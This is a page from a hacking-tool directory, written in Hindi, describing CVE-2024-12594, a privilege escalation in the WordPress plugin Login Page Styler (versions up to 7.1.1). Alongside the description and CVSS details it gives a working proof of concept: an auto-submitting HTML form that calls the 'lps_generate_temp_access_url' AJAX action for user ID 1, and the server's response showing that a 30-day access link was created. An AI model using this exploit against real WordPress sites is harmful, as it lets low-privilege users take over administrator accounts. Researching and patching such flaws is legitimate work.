Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12594 — ALL In One Custom Login Page <= 7.1.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए अनुमोदन की कमी से विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12594
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-12594

CVE-2024-12594

ALL In One Custom Login Page <= 7.1.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए अनुमोदन की कमी से विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12594

ALL In One Custom Login Page <= 7.1.1 - प्रमाणित (Subscriber+) उपयोगकर्ताओं के लिए लापता प्राधिकरण जाँच के कारण विशेषाधिकार वृद्धि

विवरण

Custom Login Page Styler – लॉगिन संरक्षित निजी साइट, wp-admin लॉगिन URL बदलें, WordPress लॉगिन लोगो, अस्थायी व्यवस्थापक लॉगिन पहुँच, लॉगिन का नाम बदलें, लॉगिन कस्टमाइज़र, wp-login छिपाएँ – लॉगिन प्रयास सीमित करें – लॉक्ड साइट नामक WordPress प्लगइन, 'lps_generate_temp_access_url' AJAX क्रिया पर क्षमता जाँच (capability check) की कमी के कारण 7.1.1 तक के सभी संस्करणों में विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है। यह प्रमाणित हमलावरों को, जिनके पास सब्सक्राइबर-स्तर या उससे ऊपर की पहुँच है, सब्सक्राइबर जैसे अन्य उपयोगकर्ताओं के रूप में लॉगिन करना संभव बनाता है।

विवरण

  • प्रकार: प्लगइन
  • स्लग: login-page-styler
  • प्रभावित संस्करण: 7.1.1
  • CVSS स्कोर: 8.8
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12594
  • स्थिति: सक्रिय

POC

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="lps&#95;generate&#95;temp&#95;access&#95;url" />
      <input type="hidden" name="user&#95;id" value="1" />
      <input type="hidden" name="expiration&#95;time" value="2592000" />
      <input type="hidden" name="nonce" value="90cc73ad2a" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
root@kitploit:~
{"success":true,"data":{"temp_url":"https:\/\/wp-dev.ddev.site?temp_access=Osn6apJoSJunYNqOhDsn&user_id=1","message":"Temporary access URL created successfully for 30 Day(s)."}}
टूल डाउनलोड करें